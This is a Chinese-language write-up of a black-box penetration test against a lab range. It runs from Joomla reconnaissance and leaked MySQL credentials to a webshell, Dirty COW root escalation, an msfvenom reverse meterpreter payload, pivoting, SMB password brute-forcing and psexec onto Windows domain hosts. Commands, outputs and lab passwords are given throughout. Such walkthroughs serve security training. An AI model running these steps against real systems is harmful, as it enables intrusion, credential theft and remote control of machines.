赞
踩
需要新建一个VMnet2(192.168.93.0/24),DHCP起始的IP一定要小于10,(有一个内网主机的IP地址是192.168.93.10)
web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡
**五台靶机不要关机,要挂起,因为时黑盒测试,我们不知道密码,靶机中有的服务没有开机自启.(尽量拍一个快照)**
开机时,查看5个靶机的网卡状态,除了web-centos是桥接+vmnet2模式,其他都是vmnet2模式
┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.115
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1 b8:3a:08:3b:f9:30 Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.101 00:0c:29:32:46:c9 VMware, Inc.
192.168.0.107 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.0.101是外网的服务器
┌──(root㉿kali)-[~] └─# nmap -sC -sV -p- 192.168.0.101 --min-rate 10000 Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-01 23:55 EST Nmap scan report for 192.168.0.101 (192.168.0.101) Host is up (0.0016s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 5.3 (protocol 2.0) | ssh-hostkey: | 1024 2584c6cc2c8a7b8f4a7c60f1a3c9b022 (DSA) |_ 2048 58d14c592d85ae0769240add720f45a5 (RSA) 80/tcp open http nginx 1.9.4 | http-robots.txt: 15 disallowed entries | /joomla/administrator/ /administrator/ /bin/ /cache/ | /cli/ /components/ /includes/ /installation/ /language/ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ |_http-generator: Joomla! - Open Source Content Management |_http-title: Home |_http-server-header: nginx/1.9.4 3306/tcp open mysql MySQL 5.7.27-0ubuntu0.16.04.1 | mysql-info: | Protocol: 10 | Version: 5.7.27-0ubuntu0.16.04.1 | Thread ID: 5 | Capabilities flags: 63487 | Some Capabilities: Support41Auth, SupportsLoadDataLocal, Speaks41ProtocolOld, SupportsTransactions, SupportsCompression, InteractiveClient, LongColumnFlag, LongPassword, IgnoreSigpipes, FoundRows, ConnectWithDatabase, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, IgnoreSpaceBeforeParenthesis, ODBCClient, SupportsMultipleResults, SupportsAuthPlugins, SupportsMultipleStatments | Status: Autocommit | Salt: 9VS,=VV#\x04p? 8N\x7Ff`.)\x16 |_ Auth Plugin Name: mysql_native_password MAC Address: 00:0C:29:32:46:C9 (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 63.58 seconds
┌──(root㉿kali)-[~] └─# gobuster dir -u http://192.168.0.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.0.101 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /images (Status: 301) [Size: 315] [--> http://192.168.0.101/images/] /media (Status: 301) [Size: 314] [--> http://192.168.0.101/media/] /templates (Status: 301) [Size: 318] [--> http://192.168.0.101/templates/] /modules (Status: 301) [Size: 316] [--> http://192.168.0.101/modules/] /bin (Status: 301) [Size: 312] [--> http://192.168.0.101/bin/] /plugins (Status: 301) [Size: 316] [--> http://192.168.0.101/plugins/] /includes (Status: 301) [Size: 317] [--> http://192.168.0.101/includes/] /language (Status: 301) [Size: 317] [--> http://192.168.0.101/language/] /components (Status: 301) [Size: 319] [--> http://192.168.0.101/components/] /cache (Status: 301) [Size: 314] [--> http://192.168.0.101/cache/] /libraries (Status: 301) [Size: 318] [--> http://192.168.0.101/libraries/] /tmp (Status: 301) [Size: 312] [--> http://192.168.0.101/tmp/] /layouts (Status: 301) [Size: 316] [--> http://192.168.0.101/layouts/] /administrator (Status: 301) [Size: 322] [--> http://192.168.0.101/administrator/] /cli (Status: 301) [Size: 312] [--> http://192.168.0.101/cli/] /server-status (Status: 403) [Size: 278] Progress: 220560 / 220561 (100.00%) =============================================================== Finished ===============================================================
┌──(root㉿kali)-[~] └─# dirsearch -u "http://192.168.0.101" _|. _ _ _ _ _ _|_ v0.4.3 (_||| _) (/_(_|| (_| ) Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460 Output File: /root/reports/http_192.168.0.101/_24-02-02_00-07-30.txt Target: http://192.168.0.101/ [00:07:30] Starting: [00:07:32] 403 - 278B - /.configuration.php.swp [00:07:34] 403 - 278B - /.ht_wsr.txt [00:07:34] 403 - 278B - /.htaccess.bak1 [00:07:34] 403 - 278B - /.htaccess.sample [00:07:34] 403 - 278B - /.htaccess.save [00:07:34] 403 - 278B - /.htaccess_extra [00:07:34] 403 - 278B - /.htaccess_orig [00:07:34] 403 - 278B - /.htaccessBAK [00:07:34] 403 - 278B - /.htaccessOLD2 [00:07:34] 403 - 278B - /.htaccessOLD [00:07:34] 403 - 278B - /.htaccess_sc [00:07:34] 403 - 278B - /.htaccess.orig [00:07:34] 403 - 278B - /.htpasswd_test [00:07:34] 403 - 278B - /.htm [00:07:34] 403 - 278B - /.html [00:07:34] 403 - 278B - /.htpasswds [00:07:34] 403 - 278B - /.httr-oauth [00:07:36] 403 - 278B - /.php [00:07:38] 200 - 24KB - /1.php [00:07:38] 200 - 0B - /2.php [00:07:51] 301 - 322B - /administrator -> http://192.168.0.101/administrator/ [00:07:51] 200 - 31B - /administrator/cache/ [00:07:51] 200 - 31B - /administrator/logs/ [00:07:51] 200 - 525B - /administrator/includes/ [00:07:51] 301 - 327B - /administrator/logs -> http://192.168.0.101/administrator/logs/ [00:07:51] 200 - 2KB - /administrator/ [00:07:52] 200 - 2KB - /administrator/index.php [00:07:57] 200 - 31B - /bin/ [00:07:57] 301 - 312B - /bin -> http://192.168.0.101/bin/ [00:07:58] 301 - 314B - /cache -> http://192.168.0.101/cache/ [00:07:58] 200 - 31B - /cache/ [00:08:00] 200 - 31B - /cli/ [00:08:01] 200 - 31B - /components/ [00:08:01] 301 - 319B - /components -> http://192.168.0.101/components/ [00:08:02] 200 - 0B - /configuration.php [00:08:02] 200 - 2KB - /configuration.php~ [00:08:12] 200 - 1KB - /htaccess.txt [00:08:13] 200 - 31B - /images/ [00:08:13] 301 - 315B - /images -> http://192.168.0.101/images/ [00:08:14] 301 - 317B - /includes -> http://192.168.0.101/includes/ [00:08:14] 200 - 31B - /includes/ [00:08:14] 200 - 4KB - /index.php [00:08:14] 200 - 3KB - /index.php/login/ [00:08:17] 301 - 317B - /language -> http://192.168.0.101/language/ [00:08:17] 200 - 31B - /layouts/ [00:08:17] 301 - 318B - /libraries -> http://192.168.0.101/libraries/ [00:08:17] 200 - 31B - /libraries/ [00:08:17] 200 - 7KB - /LICENSE.txt [00:08:21] 301 - 314B - /media -> http://192.168.0.101/media/ [00:08:21] 200 - 31B - /media/ [00:08:23] 200 - 31B - /modules/ [00:08:22] 301 - 316B - /modules -> http://192.168.0.101/modules/ [00:08:30] 301 - 316B - /plugins -> http://192.168.0.101/plugins/ [00:08:30] 200 - 31B - /plugins/ [00:08:33] 200 - 2KB - /README.txt [00:08:34] 200 - 392B - /robots.txt [00:08:35] 403 - 278B - /server-status [00:08:35] 403 - 278B - /server-status/ [00:08:42] 301 - 318B - /templates -> http://192.168.0.101/templates/ [00:08:42] 200 - 31B - /templates/index.html [00:08:42] 200 - 0B - /templates/protostar/ [00:08:42] 200 - 0B - /templates/system/ [00:08:42] 200 - 31B - /templates/ [00:08:42] 200 - 0B - /templates/beez3/ [00:08:43] 301 - 312B - /tmp -> http://192.168.0.101/tmp/ [00:08:43] 200 - 31B - /tmp/ [00:08:48] 200 - 628B - /web.config.txt Task Completed
:joomscan -u http://192.168.0.101 ____ _____ _____ __ __ ___ ___ __ _ _ (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( ) .-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) ( \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_) (1337.today) --=[OWASP JoomScan +---++---==[Version : 0.0.7 +---++---==[Update Date : [2018/09/23] +---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo --=[Code name : Self Challenge @OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASP Processing http://192.168.0.101 ... [+] FireWall Detector [++] Firewall not detected [+] Detecting Joomla Version [++] Joomla 3.9.12 [+] Core Joomla Vulnerability [++] Target Joomla core is not vulnerable [+] Checking Directory Listing [++] directory has directory listing : http://192.168.0.101/administrator/components http://192.168.0.101/administrator/modules http://192.168.0.101/administrator/templates http://192.168.0.101/images/banners [+] Checking apache info/status files [++] Readable info/status files are not found [+] admin finder [++] Admin page : http://192.168.0.101/administrator/ [+] Checking robots.txt existing [++] robots.txt is found path : http://192.168.0.101/robots.txt Interesting path found from robots.txt http://192.168.0.101/joomla/administrator/ http://192.168.0.101/administrator/ http://192.168.0.101/bin/ http://192.168.0.101/cache/ http://192.168.0.101/cli/ http://192.168.0.101/components/ http://192.168.0.101/includes/ http://192.168.0.101/installation/ http://192.168.0.101/language/ http://192.168.0.101/layouts/ http://192.168.0.101/libraries/ http://192.168.0.101/logs/ http://192.168.0.101/modules/ http://192.168.0.101/plugins/ http://192.168.0.101/tmp/ [+] Finding common backup files name [++] Backup files are not found [+] Finding common log files name [++] error log is not found [+] Checking sensitive config.php.x file [++] Readable config file is found config file path : http://192.168.0.101/configuration.php~ Your Report : reports/192.168.0.101/
┌──(root㉿kali)-[~] └─# nikto -h 192.168.0.101 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.0.101 + Target Hostname: 192.168.0.101 + Target Port: 80 + Start Time: 2024-02-02 00:09:01 (GMT-5) --------------------------------------------------------------------------- + Server: nginx/1.9.4 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Entry '/administrator/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/bin/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/cache/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/cli/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/components/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/language/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/layouts/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/libraries/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/plugins/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + Entry '/tmp/' in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 14 entries which should be manually viewed. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + OSVDB-3092: /administrator/: This might be interesting... + OSVDB-3092: /bin/: This might be interesting... + OSVDB-3092: /includes/: This might be interesting... + OSVDB-3092: /tmp/: This might be interesting... + OSVDB-3092: /LICENSE.txt: License file found may identify site software. + OSVDB-3233: /icons/README: Apache default file found. + /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed. + /administrator/index.php: Admin login page/section found. + 8740 requests: 0 error(s) and 25 item(s) reported on remote host + End Time: 2024-02-02 00:10:00 (GMT-5) (59 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
┌──(root㉿kali)-[~] └─# nmap --script=vuln -p 80,3306,22 192.168.0.101 Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-02 00:12 EST Nmap scan report for 192.168.0.101 (192.168.0.101) Host is up (0.00051s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. | http-csrf: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.101 | Found the following possible CSRF vulnerabilities: | | Path: http://192.168.0.101:80/ | Form id: mod-search-searchword87 | Form action: /index.php | | Path: http://192.168.0.101:80/index.php/login | Form id: mod-search-searchword87 | Form action: /index.php/login | | Path: http://192.168.0.101:80/index.php/login | Form id: username-lbl | Form action: /index.php/login?task=user.login | | Path: http://192.168.0.101:80/index.php/6-your-template | Form id: mod-search-searchword87 | Form action: /index.php | | Path: http://192.168.0.101:80/index.php/3-welcome-to-your-blog | Form id: mod-search-searchword87 | Form action: /index.php | | Path: http://192.168.0.101:80/index.php | Form id: mod-search-searchword87 | Form action: /index.php | | Path: http://192.168.0.101:80/index.php/author-login | Form id: mod-search-searchword87 | Form action: /index.php/author-login | | Path: http://192.168.0.101:80/index.php/author-login | Form id: username-lbl |_ Form action: /index.php/author-login?task=user.login | http-enum: | /administrator/: Possible admin folder | /administrator/index.php: Possible admin folder | /robots.txt: Robots file | /administrator/manifests/files/joomla.xml: Joomla version 3.9.12 | /language/en-GB/en-GB.xml: Joomla version 3.9.12 | /htaccess.txt: Joomla! | /README.txt: Interesting, a readme. | /bin/: Potentially interesting folder | /cache/: Potentially interesting folder | /images/: Potentially interesting folder | /includes/: Potentially interesting folder | /libraries/: Potentially interesting folder | /modules/: Potentially interesting folder | /templates/: Potentially interesting folder |_ /tmp/: Potentially interesting folder | http-dombased-xss: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.101 | Found the following indications of potential DOM based XSS: | | Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no') |_ Pages: http://192.168.0.101:80/, http://192.168.0.101:80/, http://192.168.0.101:80/, http://192.168.0.101:80/, http://192.168.0.101:80/index.php/6-your-template, http://192.168.0.101:80/index.php/3-welcome-to-your-blog, http://192.168.0.101:80/index.php, http://192.168.0.101:80/index.php, http://192.168.0.101:80/index.php, http://192.168.0.101:80/index.php 3306/tcp open mysql MAC Address: 00:0C:29:32:46:C9 (VMware) Nmap done: 1 IP address (1 host up) scanned in 82.80 seconds
通过nmap,得知192.168.0.101开放了22,80,3306端口
还是以joomla框架搭建的网站,用joomscan工具,扫描出joomla版本是3.9.12
http://192.168.0.101/administrator/
http://192.168.0.101/configuration.php~
http://192.168.0.101/robots.txt
通过一系列的查找,发现http://192.168.0.101/configuration.php~ 页面下,查看源码发现MySQL账号密码
testuser/cvcvgjASD!@
┌──(root㉿kali)-[~] └─# mysql -h 192.168.0.101 -utestuser -p Enter password: Welcome to the MariaDB monitor. Commands end with ; or \g. Your MySQL connection id is 2051 Server version: 5.7.27-0ubuntu0.16.04.1 (Ubuntu) Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. MySQL [(none)]> show databases; +--------------------+ | Database | +--------------------+ | information_schema | | joomla | +--------------------+ 2 rows in set (0.007 sec) MySQL [(none)]> use joomla Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed MySQL [joomla]> show tables; +-------------------------------+ | Tables_in_joomla | +-------------------------------+ | am2zu_action_log_config | | am2zu_action_logs | | am2zu_action_logs_extensions | | am2zu_action_logs_users | ....... 进入到joomla库中,找到am2zu_users表,为什么不找另一个user表呢?源码中有提示
MySQL [joomla]> select * from am2zu_users;
+-----+------------+---------------+---------------+----------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset |
+-----+------------+---------------+---------------+----------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
| 891 | Super User | administrator | test@test.com | e10adc3949ba59abbe56e057f20f883e | 0 | 1 | 2019-10-19 12:48:41 | 2024-01-30 06:35:55 | 0 | {} | 0000-00-00 00:00:00 | 0 | | | 0 |
+-----+------------+---------------+---------------+----------------------------------+-------+-----------+---------------------+---------------------+------------+--------+---------------------+------------+--------+------+--------------+
1 row in set (0.003 sec)
MySQL [joomla]> update am2zu_users set password=md5(123456) where id=891;
Query OK, 0 rows affected (0.008 sec)
Rows matched: 1 Changed: 0 Warnings: 0
怎么找可以写马的地方呢?
通过刚刚的目录扫描,找到后台页面,可以插入php代码且能访问的地方,或可以文件上传
git clone https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD.git
将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/
将bypass_disablefunc_x64.so上传到/var/www/下
构造payload
http://192.168.0.101/c.php?cmd=ls -al&outpath=/tmp/123&sopath=/var/www/bypass_disablefunc_x64.so
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120
netstat -ntapl命令,发现93.120的80端口和93.100的34704端口连接
说明100主机替120主机,进行代理转发
>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx
┌──(root㉿kali)-[~/kali/hr3] └─# ssh -oHostKeyAlgorithms=+ssh-dss wwwuser@192.168.0.101 wwwuser@192.168.0.101's password: Last login: Sun Oct 6 20:24:43 2019 from 192.168.1.122 [wwwuser@192 ~]$ ls [wwwuser@192 ~]$ ls -al 总用量 28 drwx------. 3 wwwuser wwwuser 4096 10月 6 20:25 . drwxr-xr-x. 3 root root 4096 10月 6 16:27 .. -rw-------. 1 wwwuser wwwuser 52 10月 6 20:25 .bash_history -rw-r--r--. 1 wwwuser wwwuser 18 7月 18 2013 .bash_logout -rw-r--r--. 1 wwwuser wwwuser 176 7月 18 2013 .bash_profile -rw-r--r--. 1 wwwuser wwwuser 124 7月 18 2013 .bashrc drwxrw----. 3 wwwuser wwwuser 4096 10月 6 16:28 .pki [wwwuser@192 ~]$ uname -a Linux 192.168.0.101 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
考虑到版本低的情况我们使用脏牛提权
git clone https://github.com/firefart/dirtycow.git
1.首先将kali开启python服务
┌──(root㉿kali)-[~/kali/CVE/dirtycow]
└─# ls
dirty.c README.md
┌──(root㉿kali)-[~/kali/CVE/dirtycow]
└─# python3 -m http.server 9999
Serving HTTP on 0.0.0.0 port 9999 (http://0.0.0.0:9999/) ...
192.168.0.101 - - [02/Feb/2024 01:46:31] "GET /dirty.c HTTP/1.0" 200 -
2.靶机下载dirty.c,并且编译c文件 [wwwuser@192 ~]$ cd /tmp [wwwuser@192 tmp]$ ls passwd.bak yum.log [wwwuser@192 tmp]$ rm passwd.bak [wwwuser@192 tmp]$ wget http://192.168.0.115:9999/dirty.c --2019-10-06 22:25:17-- http://192.168.0.115:9999/dirty.c 正在连接 192.168.0.115:9999... 已连接。 已发出 HTTP 请求,正在等待回应... 200 OK 长度:4815 (4.7K) [text/x-csrc] 正在保存至: “dirty.c” 100%[==========================================================================================================================================>] 4,815 --.-K/s in 0s 2019-10-06 22:25:17 (62.8 MB/s) - 已保存 “dirty.c” [4815/4815]) [wwwuser@192 tmp]$ gcc -pthread dirty.c -o dirty -lcrypt [wwwuser@192 tmp]$ ls -al 总用量 32 drwxrwxrwt. 3 root root 4096 10月 6 22:25 . dr-xr-xr-x. 22 root root 4096 10月 6 13:25 .. -rwxrwxr-x. 1 wwwuser wwwuser 12056 10月 6 22:25 dirty -rw-rw-r--. 1 wwwuser wwwuser 4815 1月 30 2024 dirty.c drwxrwxrwt. 2 root root 4096 10月 6 13:25 .ICE-unix -rw-------. 1 root root 0 10月 6 12:38 yum.log [wwwuser@192 tmp]$ ./dirty /etc/passwd successfully backed up to /tmp/passwd.bak Please enter the new password: Complete line: firefart:fi8RL.Us0cfSs:0:0:pwned:/root:/bin/bash mmap: 7ff702e6c000 ptrace 0 Done! Check /etc/passwd to see if the new user was created. You can log in with the username 'firefart' and the password '123456'. DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
3.脏牛提权是创建一个新的root用户
如上,创建了一个firefart用户,密码是刚刚自己输入的
[wwwuser@192 tmp]$ su firefart
密码:
[firefart@192 tmp]# id
uid=0(firefart) gid=0(root) 组=0(root) 环境=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
┌──(root㉿kali)-[~/kali/CVE/dirtycow]
└─# msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.0.115 lport=5666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf -o shell.elf
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 130 bytes
Final size of elf file: 250 bytes
Saved as: shell.elf
SessionCommunicationTimeout=0: 设置会话的通信超时时间为0,意味着没有超时限制。
SessionExpirationTimeout=0: 设置会话的过期时间为0,意味着没有过期限制。
-f elf: 指定输出格式为ELF文件
-o shell.elf: 输出文件名为shell.elf。
┌──(root㉿kali)-[~] └─# msfconsole ____________ [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%] [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] =[ metasploit v6.2.26-dev ] + -- --=[ 2264 exploits - 1189 auxiliary - 404 post ] + -- --=[ 951 payloads - 45 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: Writing a custom module? After editing your module, why not try the reload command Metasploit Documentation: https://docs.metasploit.com/ msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp payload => linux/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.0.115 lhost => 192.168.0.115 msf6 exploit(multi/handler) > set lport 5666 lport => 5666 msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.0.115:5666
[firefart@192 ~]# wget http://192.168.0.115:9999/shell.elf
--2019-10-06 22:53:15-- http://192.168.0.115:9999/shell.elf
正在连接 192.168.0.115:9999... 已连接。
已发出 HTTP 请求,正在等待回应... 200 OK
长度:250 [application/octet-stream]
正在保存至: “shell.elf”
100%[==========================================================================================================================================>] 250 --.-K/s in 0s
2019-10-06 22:53:15 (4.02 MB/s) - 已保存 “shell.elf” [250/250])
[firefart@192 ~]# ls
anaconda-ks.cfg install.log install.log.syslog nginx-1.9.4 nginx-1.9.4.tar.gz shell.elf
[firefart@192 ~]# chmod +x shell.elf
[firefart@192 ~]# ./shell.elf
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.0.115:5666
[*] Sending stage (3045348 bytes) to 192.168.0.101
[*] Meterpreter session 1 opened (192.168.0.115:5666 -> 192.168.0.101:59436) at 2024-02-02 02:14:50 -0500
meterpreter > getuid
Server username: firefart
meterpreter >
meterpreter > run autoroute -s 192.168.93.0/24 [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] [*] Adding a route to 192.168.93.0/255.255.255.0... [+] Added route to 192.168.93.0/255.255.255.0 via 192.168.0.101 [*] Use the -p option to list all active routes meterpreter > run autoroute -p [!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute. [!] Example: run post/multi/manage/autoroute OPTION=value [...] Active Routing Table ==================== Subnet Netmask Gateway ------ ------- ------- 192.168.93.0 255.255.255.0 Session 1 meterpreter > background [*] Backgrounding session 1...
use auxiliary/scanner/smb/smb_version
set rhost 192.168.93.0/24
set threads 20
run
[*] 192.168.93.10:445 - SMB Detected (versions:1, 2, 3) (preferred dialect:SMB 3.0.2) (signatures:required) (uptime:35s) (guid:{01d2b26e-2059-4623-81fe-17014eade877}) (authentication domain:TEST)
[+] 192.168.93.10:445 - Host is running Windows 2012 R2 Datacenter (build:9600) (name:WIN-8GA56TNV3MV) (domain:TEST)
[*] 192.168.93.20:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.0.2) (signatures:optional) (uptime:215w 6d 0h 22m 25s) (guid:{f9644969-0bf4-48c7-ab87-58ba8044ed81}) (authentication domain:TEST)
[+] 192.168.93.20:445 - Host is running Windows 2008 Datacenter SP2 (build:6003) (name:WIN2008) (domain:TEST)
[*] 192.168.93.30:445 - SMB Detected (versions:1, 2) (preferred dialect:SMB 2.1) (signatures:optional) (uptime:19m 36s) (guid:{5333dd46-78d3-4896-baf2-21fde1d035bb}) (authentication domain:TEST)
[+] 192.168.93.30:445 - Host is running Windows 7 Professional SP1 (build:7601) (name:WIN7) (domain:TEST)
得到192.168.93.10;192.168.93.20;192.168.93.30内网主机存活
use auxiliary/scanner/smb/smb_login
set rhosts 192.168.93.10
set smbuser administrator (用户名)
set pass_file /root/1000top (字典)
set threads 20 (线程)
run
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
rhosts => 192.168.93.10
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.10:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[+] 192.168.93.10:445 - 192.168.93.10:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.20
rhosts => 192.168.93.20
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.20:445 - 192.168.93.20:445 - Starting SMB login bruteforce
[+] 192.168.93.20:445 - 192.168.93.20:445 - Success: '.\administrator:123qwe!ASD' Administrator
[*] 192.168.93.20:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > set rhosts 192.168.93.10
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.93.10:445 - 192.168.93.10:445 - Starting SMB login bruteforce
[+] 192.168.93.10:445 - 192.168.93.10:445 - Success: '.\administrator:zxcASDqw123!!' Administrator
[*] 192.168.93.10:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
通过爆破得到内网主机的密码
192.168.93.30 administrator:123qwe!ASD
192.168.93.20 administrator:123qwe!ASD
192.168.93.10 administrator:zxcASDqw123!!
msf6 exploit(multi/handler) > use exploit/windows/smb/psexec [*] No payload configured, defaulting to windows/meterpreter/reverse_tcp msf6 exploit(windows/smb/psexec) > options Module options (exploit/windows/smb/psexec): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 445 yes The SMB service port (TCP) SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing SERVICE_DISPLAY_NAME no The service display name SERVICE_NAME no The service name SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBSHARE no The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share SMBUser no The username to authenticate as Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) LHOST 192.168.0.115 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. msf6 exploit(windows/smb/psexec) > set rhosts 192.168.93.30 rhosts => 192.168.93.30 msf6 exploit(windows/smb/psexec) > set payload windows/x64/meterpreter/bind_tcp payload => windows/x64/meterpreter/bind_tcp msf6 exploit(windows/smb/psexec) > set SMBUser administrator SMBUser => administrator msf6 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD smbpass => 123qwe!ASD msf6 exploit(windows/smb/psexec) > run [*] 192.168.93.30:445 - Connecting to the server... [*] 192.168.93.30:445 - Authenticating to 192.168.93.30:445 as user 'administrator'... [*] 192.168.93.30:445 - Selecting PowerShell target [*] 192.168.93.30:445 - Executing the payload... [+] 192.168.93.30:445 - Service start timed out, OK if running a command or non-service executable... [*] Started bind TCP handler against 192.168.93.30:4444 [*] Sending stage (200774 bytes) to 192.168.93.30 [*] Meterpreter session 3 opened (192.168.93.100:56550 -> 192.168.93.30:4444 via session 2) at 2024-02-02 08:25:10 -0500 meterpreter >
post/windows/gather/enum_domain模块用于在 Windows 系统中收集与域相关的信息。这个模块可以帮助攻击者获取有关域环境的一些重要信息,例如域控制器、域名、域用户和组等
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > run post/windows/gather/enum_domain
[+] Domain FQDN: test.org
[+] Domain NetBIOS Name: TEST
